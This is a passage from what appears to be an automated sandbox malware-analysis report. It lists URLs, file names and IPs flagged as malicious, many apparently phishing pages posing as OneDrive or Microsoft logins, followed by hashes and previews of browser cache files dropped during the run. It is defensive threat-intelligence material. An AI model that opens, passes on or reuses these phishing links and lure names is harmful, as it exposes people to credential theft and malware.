https://u10520081.ct.sendgrid.net/wf/click?upn=jYlCtn5-2BPW5ucXpaCyqStVH3HEQUa2UKlpMzTVoldFM-3D_9mVef8XBOHUAB1Yp8VbE5b6cE7OrBvd4swG8dKZc1sPHvUY2cvsa2domirFVgsA7wTpafr9ZcbLjQDgrwzRN1Sfz5gUDTAosURfQrkaiHQa9xhTrZ7vxiPsOVhaDJBvhQGmXib5DzN3yHHWyi1-2Bs4dHWxanwSL0UHC4LH5kW-2BXt-2F7dR3iEvUlCpV-2Bigo7RxS8gDytzsBNig0TTG2iACzti9Cn3fcuAB9gNnTJ0mFlqA-3D
Get hash malicious Browse 192.229.221.185
https://1drv.ms/b/s!AhJu8bKGuybLclKouKsoIXrGDx8 Get hash malicious Browse 192.229.221.185
https://user7779793e792782.z14.web.core.windows.net/index.htm?=en-US&[email protected]
Get hash malicious Browse 192.229.221.185
login.live.com.office.flagstarbancorp.myshn.net Get hash malicious Browse 192.229.221.185
https://aus01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fonedrive.live.com%2Fredir%3Fresid%3D429413BE603FA343!5758%26authkey%3D!ABt3LPTU6MynWOk%26ithint%3Dfile%252cdocx&data=02%7C01%7Cdamienc%40australianballet.com.au%7Cf3dff5c1c69746509e0c08d6ef0bf767%7C363ab79152b7474a91175bf36bde2b94%7C0%7C0%7C636959232091196729&sdata=9I2tuU2dOpmt0o7AgOaq9Wuz9mjMhKAd7LA55pbkQqQ%3D&reserved=0
Get hash malicious Browse 192.229.221.185
https://1drv.ms/b/s!AvO7bN5acODYawc9teh52z5A8HI?e=3T7pcW
Get hash malicious Browse 192.229.221.185
https://outlookloffice365user23k-secondary.z14.web.core.windows.net/d41d8cd98f00b204e9800998ecf8427e89de54095edc1a5eb8c27bdf9c492019/89de54095edc1a5eb8c27bdf9c492019/#[email protected]
Get hash malicious Browse 192.229.221.185
https://onedrive.live.com/?authkey=%21AGoRsXinDPWY5Mc&cid=4694365C78123852&id=4694365C78123852%21134&parId=root&o=OneUp
Get hash malicious Browse 192.229.221.185
Match Associated Sample Name / URL SHA 256 Detection Link Context
Copyright Joe Security LLC 2019 Page 14 of 47
www.housewittorp.com/wp-includes/images/crystal/of_nw/of_nw20-10-2019/off.sss/786f23d16213fff8ba639cedee5f69a8/login.htm?cmd=login_submit&id=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa&session=bbe3bfe87c61dd28e1a018fb1af599aabbe3bfe87c61dd28e1a018fb1af599aa
Get hash malicious Browse 192.229.221.185
https://943d.app.link/ Get hash malicious Browse 192.229.221.185
https://protection.office.com/threatexplorer#/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=allemail&query-CanonicalizedUrl=https://onedrive.live.com/?authkey=%21AKOGMaypqRvjuxE&cid=30A2F54D2B9B8460&id=30A2F54D2B9B8460%21170&parId=root&o=OneUp
Get hash malicious Browse 192.229.221.185
CRY INV#98634.htm Get hash malicious Browse 192.229.221.185
Match Associated Sample Name / URL SHA 256 Detection Link Context
Match Associated Sample Name / URL SHA 256 Detection Link Context
unknown request.doc Get hash malicious Browse 192.168.0.44
FERK444259.doc Get hash malicious Browse 192.168.0.44
b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js
Get hash malicious Browse 192.168.0.40
Setup.exe Get hash malicious Browse 192.168.0.40
base64.pdf Get hash malicious Browse 192.168.0.40
file.pdf Get hash malicious Browse 192.168.0.40
Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40
request_08.30.doc Get hash malicious Browse 192.168.0.44
P_2038402.xlsx Get hash malicious Browse 192.168.0.44
48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22
seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40
Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40
QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40
pptxb.pdf Get hash malicious Browse 192.168.0.40
unknown request.doc Get hash malicious Browse 192.168.0.44
FERK444259.doc Get hash malicious Browse 192.168.0.44
b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js
Get hash malicious Browse 192.168.0.40
Setup.exe Get hash malicious Browse 192.168.0.40
base64.pdf Get hash malicious Browse 192.168.0.40
file.pdf Get hash malicious Browse 192.168.0.40
Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40
request_08.30.doc Get hash malicious Browse 192.168.0.44
P_2038402.xlsx Get hash malicious Browse 192.168.0.44
48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22
seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40
Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40
QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40
pptxb.pdf Get hash malicious Browse 192.168.0.40
Match Associated Sample Name / URL SHA 256 Detection Link Context
9e10692f1b7f78228b2d4e424db3a98c DOC1212122211111.pdf Get hash malicious Browse 192.229.221.185
https://cardinalhealth.finance/disribution/ Get hash malicious Browse 192.229.221.185
here.skynnovations.com/availible/ Get hash malicious Browse 192.229.221.185
www.bit.ly/[email protected]&&25.63.34.80&&cc0_34k3=safety-cuttingtools.com&[email protected]&NOI8E6JE=safety-cuttingtools.com&[email protected]&&7165&&cc0_34k3=pascal%20martinet&YY0G3FG=safety-cuttingtools.com&[email protected]
Get hash malicious Browse 192.229.221.185
store.zionshope.org Get hash malicious Browse 192.229.221.185
ASN
JA3 Fingerprints
Copyright Joe Security LLC 2019 Page 15 of 47
https://ware.in.net/pro/Onedrive/index.php Get hash malicious Browse 192.229.221.185
Updated SOW.pdf Get hash malicious Browse 192.229.221.185
www.egtenterprise.com Get hash malicious Browse 192.229.221.185
https://www.truesyd.com.au/000/Ovvice1/[email protected]
Get hash malicious Browse 192.229.221.185
https://www.truesyd.com.au/000/Ovvice1/[email protected]
Get hash malicious Browse 192.229.221.185
www.zionshope.org Get hash malicious Browse 192.229.221.185
Invoicepng (1).pdf Get hash malicious Browse 192.229.221.185
Review.xps Get hash malicious Browse 192.229.221.185
https://lootart.com/qtext/ Get hash malicious Browse 192.229.221.185
meadowss.gq Get hash malicious Browse 192.229.221.185
https://nameserverip.xyz/sgn/D2019HL Get hash malicious Browse 192.229.221.185
https://orlando.in.net/[email protected] Get hash malicious Browse 192.229.221.185
https://angleshelf.sharepoint.com/:b:/s/ShapiroMasseyLLC/EZ2wTj09HkpIouJm6biidOwBQ1TN1ia5jLFP6D3lYHu1_Q?e=KJ4ytm
Get hash malicious Browse 192.229.221.185
https://thedevcomp.net/pop/login/index.php Get hash malicious Browse 192.229.221.185
https://tryanmcv.com/login.php?l=_JeHFUq_VJOXK0QWHtoGYDw1774256418&fid.13InboxLight.aspxn.1774256418&fid.125289964252813InboxLight99642_Product-userid&userid=
Get hash malicious Browse 192.229.221.185
Match Associated Sample Name / URL SHA 256 Detection Link Context
No context
ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
Dropped Files
Screenshots
Copyright Joe Security LLC 2019 Page 16 of 47
System is w10x64
iexplore.exe (PID: 4576 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
iexplore.exe (PID: 4256 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4576 CREDAT:17410 /prefetch:2 MD5:
071277CC2E3DF41EEEA8013E2AB58D5A)cleanup
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6B3F30D4-A233-11E9-AADA-C25F135D3C65}.datProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Size (bytes): 33368
Entropy (8bit): 1.8703255075059053
Encrypted: false
MD5: 43DA58C7C3881105E3BC3BFAB5B2C624
SHA1: 2E15BB7A248FE3CA5CAC42BC5101F213E8EB7859
SHA-256: 5494620DF4A1B519CA7464D76F85AEE5184CBF3F11E1C4AD2B41166299621F84
SHA-512: 2CD96BC4688AC4ED567213F1A3FE976A0957F6C216296D6BA226C46F0613DA8D5BC2359D37307FCCC411D538D8041B3BE2ADE200B72B8F865F283ABF441A53C2
Malicious: false
Reputation: low
Startup
Created / dropped Files
Copyright Joe Security LLC 2019 Page 17 of 47
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6B3F30D4-A233-11E9-AADA-C25F135D3C65}.dat
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6B3F30D6-A233-11E9-AADA-C25F135D3C65}.datProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Size (bytes): 145638
Entropy (8bit): 3.31748929203143
Encrypted: false
MD5: 4D7CCC39C9B6C66E5EA0CA135271B236
SHA1: B9F25CC4339267086213C300302F85BF3C8DFC8A
SHA-256: E912519979650273645805E9CA60866A2DD6A77099CE4D0F1E6AD56ABA363CD0
SHA-512: 61BE585910487D5E2CF545C4DC42533AD53518BBA09091987414C78062733BF9965B65C7F3F01DF1BC253F92B3796A638363B682C565E9FAF8EEA9B496C90E0E
Malicious: false
Reputation: low
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{73B3FC37-A233-11E9-AADA-C25F135D3C65}.datProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: Microsoft Word Document
Size (bytes): 16984
Entropy (8bit): 1.5651325608710502
Encrypted: false
MD5: 507D396B22049D5BBE378C29A8E39748
SHA1: E0F898EFD82D39D9DB9936111C1254472625B3A9
SHA-256: 1CA37CF399CD8767708D6D2CF75C4B00E7AB9ED5DF93C2DF06FB2AFDD6D2C8BA
SHA-512: 3A0CB60D89AA66A24D2F1EEF52C2E11961578FF0A392469F5DE4408052CE2F06D9719E5ABF1D60075FF5ACBD8E82361579CA8ED06F6E803BCAFAEB92E4A9C9D3
Malicious: false
Reputation: low
Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 656
Entropy (8bit): 5.092233081919978
Encrypted: false
MD5: F4274E75BC32AACB92BECB9B76F184B8
SHA1: 3F511E721E9C0E483F83E9ED214ED9A32DD826BB
SHA-256: 534162358D123C4CED1C0DCD6C53ED77B63C9433FCAD829AE2CB3FBBECFAB9F7
SHA-512: E91E40E8171F3105EAA3FD587E1530534E59573AD5174AC9ABCDC8111052BBAA595E9853B23FDF92E8B008D35139185BF20E8F7F94FE43EE6EFD2A909134B8E2
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x41ffd10d,0x01d53640</date><accdate>0x41ffd10d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x41ffd10d,0x01d53640</date><accdate>0x42027f75,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 653
Entropy (8bit): 5.1183826834578765
Encrypted: false
MD5: 2C8906B52317C5877F7B4CD2EF6C45BD
SHA1: 88CB1EF93B12075D151DE8801E021A5F5D264B86
SHA-256: D1505E0F23D3E3811FF22FFD5128C88D3356D34053265A3E5BD62EB5767B093E
SHA-512: BC87F02926B97A7894E8C6AE292C2A5014807843D5B6407FE1D28B34BE99A3F3778C0C19B8D9B3F55CAECF92C1612ED4AAAEC02BDED5CB040CB210F332B4E982
Copyright Joe Security LLC 2019 Page 18 of 47
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x41c1ad24,0x01d53640</date><accdate>0x41c1ad24,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x41c1ad24,0x01d53640</date><accdate>0x41d57ed0,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 662
Entropy (8bit): 5.131340823983181
Encrypted: false
MD5: FAB148AC9F777CB82C1F2103AC509090
SHA1: 562ED02F68D604D153150A226DCD1DCCCA46554D
SHA-256: 26B18FDDDAA96EC66B709B528E0869D9141CC9BDA3072C73F213F6DED945FE9F
SHA-512: 3883F75C7FCEB4385B4093AF71E8FEE650B5CA45D499B975059D186E4AF293F4095FA16B02B8DB2AA6BE726BD3F76DEDA8591785D2DC9B529A6C038D770E53F1
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x42050801,0x01d53640</date><accdate>0x42050801,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x42050801,0x01d53640</date><accdate>0x420791db,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 647
Entropy (8bit): 5.115930101420065
Encrypted: false
MD5: 8B7BA4E727F8ACB8DB64EBF5FB230D25
SHA1: 16A8DF42F8A7FF577C9DFB56A77B1429EB086665
SHA-256: A8850950E052CD17673333599F098320C4D8EEB1136075DA8F88F1683AB643F8
SHA-512: 7C6F139B28A79E7DCB7CDE2BB34B157C0D0BFC6D526AB2C42FF0587694023F17E68603F6F0E3BC7030D191DC7B43ACFE341C20E490126AF011FAF1AEC64D3645
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x41f35f81,0x01d53640</date><accdate>0x41f35f81,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x41f35f81,0x01d53640</date><accdate>0x41f5d4eb,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 656
Entropy (8bit): 5.138443843506685
Encrypted: false
MD5: 4EF2A145D595A6E77BEAAF52BD2FDA7F
SHA1: B7E09DD6CFC440AB67880838928013D6CC30A850
SHA-256: 765CC8F692DA19011048F1EDF07A1B75BADF8A02082229E946B54EDBD785BFD6
SHA-512: 2C78ADFD8074C22D8900F00F46460CAAFAA1EED4BB4F29C5C55AAB14ABA4599A11C53ECCB6E20D5C3B43966D183904B47FDE6C85CF9EE20CE94653CD917C0707
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x420cb48e,0x01d53640</date><accdate>0x420cb48e,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x420cb48e,0x01d53640</date><accdate>0x420f3dc7,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 653
Entropy (8bit): 5.080045270510188
Copyright Joe Security LLC 2019 Page 19 of 47
Encrypted: false
MD5: 88632604F69B57E1882790DE6F5CFF7D
SHA1: E2EE8473409C5BD10C670A5EB0483C6BFD0949F3
SHA-256: E34369A12DA43B38E25C838A0865B884120F2B477B71BCA9777DDBCAF403E8ED
SHA-512: C0AE8E7BBE9806200E59D787D777B4C220E5C633E2185FD6CCD43953290E492EC3682A3462421AFA6357ED9426423F44AD07D0E3CAD189EE15C481DAEBBDD9EF
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x41faac6d,0x01d53640</date><accdate>0x41faac6d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x41faac6d,0x01d53640</date><accdate>0x41fd34f6,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 656
Entropy (8bit): 5.135533928686235
Encrypted: false
MD5: A02B5C2FFC9C50B512240E57C5146E4F
SHA1: 4BB63FDD58AA53851F95AD1DABF0F5B80452D3E9
SHA-256: 598BEB24024D238606506018EF51F26E86FF469EB1D576C26188F8C02302A1A0
SHA-512: 09C2B95C64860C96B3F9576ECBCA20352C3CAD8F5C15BDD73DB55E4C2AB8DFF224BA56733BE86B2638B732036AD8ADC3C4D7174E189AC27549181923464600F9
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x41f84a1b,0x01d53640</date><accdate>0x41f84a1b,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x41f84a1b,0x01d53640</date><accdate>0x41faac6d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 659
Entropy (8bit): 5.104813826095068
Encrypted: false
MD5: 18ADDFA8D7F62F04B4EB84C3A6271BBB
SHA1: 9544908050FEEAA9C7F3201DFD85C12BB11012D6
SHA-256: 421F93153E9B85D8FAD84927D3D0F8E349A4EE01BAC0DC2C95EA5F59E13DC922
SHA-512: AE72741B66FC9C288E4B6767E532FF28B3425401D7732FE87F2D95CF90D74E2933F4E6AAB91CC73DFD521B574D6A1A778DDF8160A1378400A1B8B8554D96D8EE
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x41e17dd5,0x01d53640</date><accdate>0x41e17dd5,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x41e17dd5,0x01d53640</date><accdate>0x41e4063d,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xmlProcess: C:\Program Files\internet explorer\iexplore.exe
File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes): 653
Entropy (8bit): 5.090773860921899
Encrypted: false
MD5: 82E65BDA761DB053CD7F5C2538B5D11F
SHA1: 0AEC3A18249F409B25F54553FB091AEECC6370D2
SHA-256: 34174AED141A4AE936CDDEC28DBD5AD06813680642E66D796CCE3B804BF17BAA
SHA-512: E57994CD8D7B343AA7CB9137E927AEFE78DAD17E334208BB869002F6832E2CA7A7F4A0247CD767F1927A99E7DBE5C7AE82CE9A1FD9F08F746F107736B45784E1
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x41ebd910,0x01d53640</date><accdate>0x41ebd910,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x41ebd910,0x01d53640</date><accdate>0x41ee4e75,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
Copyright Joe Security LLC 2019 Page 20 of 47
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\6aw4uvh\imagestore.datProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: data
Size (bytes): 72284
Entropy (8bit): 3.0775400929565304
Encrypted: false
MD5: 0955EFE2855D2095B6429167AFFB0A5C
SHA1: 7BE788245F2FAFD22DB1165B3D9BAFDF0D51509E
SHA-256: 2137D1B12AE9618FEF47E861B2D0B3D7D464BB6C1B1DCE8AF7E84C184F2F40A5
SHA-512: E3083BF3B70950CD43AC86D9098F8F0302AC7DF2F6A29BFAD183CEF3B0F6DB1FE3EB05E5F32380037C9C859A2A71EA858590A204CA1A308683D07F40D865DB71
Malicious: false
Reputation: low
Preview: W.h.t.t.p.s.:././.a.a.d.c.d.n...m.s.a.u.t.h...n.e.t./.e.s.t.s./.2...1./.c.o.n.t.e.n.t./.i.m.a.g.e.s./.f.a.v.i.c.o.n._.a._.e.u.p.a.y.f.g.g.h.q.i.a.i.7.k.9.s.o.l.6.l.g.2...i.c.o.~(................h(......(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...33333333333333333333
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\NewErrorPageTemplate[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 1612
Entropy (8bit): 4.869554560514657
Encrypted: false
MD5: DFEABDE84792228093A5A270352395B6
SHA1: E41258C9576721025926326F76063C2305586F76
SHA-256: 77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512: E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious: false
Reputation: high, very likely benign file
Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\app[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Size (bytes): 344831
Entropy (8bit): 5.052152993582276
Encrypted: false
MD5: 677E66D9B62C449D01191132B1125AE3
SHA1: A6A31BC3B401638C95C5B587D5AC8D44627C0611
SHA-256: AC1E130CBDEC824CFB8EE8FFC2CC3218365FBA0B0C23D5DAC7A8B038C1176F46
SHA-512: 77B708FA7F8E3E262B43D6978079C4E930FFD9693B05314491155856CA9A65C0622108AA468ED86B8E18AE1CD67A1CB0755B62DEE39E8D1DD53D3D6C3856DF6B
Malicious: false
Reputation: low
Preview: @font-face {. font-family: "wf_segoe-ui_normal";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.ttf") format("truetype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.svg#web") format("svg");. font-weight: normal;. font-style: normal; }..@font-face {. font-family: "wf_segoe-ui_light";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.ttf") format("truetype
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\arrow_px_up[1].gifProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: GIF image data, version 89a, 7 x 9
Size (bytes): 1305
Entropy (8bit): 3.799575332787369
Encrypted: false
MD5: BA32C65F44781F977BBB0B9F57413F48
SHA1: 3618723B0494B92619CE342EE7174EBAEFCD90D9
SHA-256: 3C3E5B3BFFB0A6122D4AD5818C7B609856B9CDC1527C7E19F8E4B042D30723E6
SHA-512: 13A1EC1F9F1651754E7494600C070D3560177B22A278652FEA9EBAC7EC71DD43A016D66CE83902A2B600DBF48F4CDD98D901F46B06084E1F20CD95AB8CED2B9D
Malicious: false
Copyright Joe Security LLC 2019 Page 21 of 47
Reputation: low
Preview: GIF89a...........3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............... .`.....\8....!>L(.b@.;.PNG........IHDR................a....sRGB.........gAMA......a.....IDAT8O.S;[email protected]....^I..<."&..W..Y...Y...........m...E.<..$..n...j..kL&......}.j....
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\arrow_px_up[1].gif
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\dnserrordiagoff[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 1678
Entropy (8bit): 4.566317707595381
Encrypted: false
MD5: 7E81A79F38695E467A49EE41DD24146D
SHA1: 035E110C36BF3072525B05394F73D1BA54D0D316
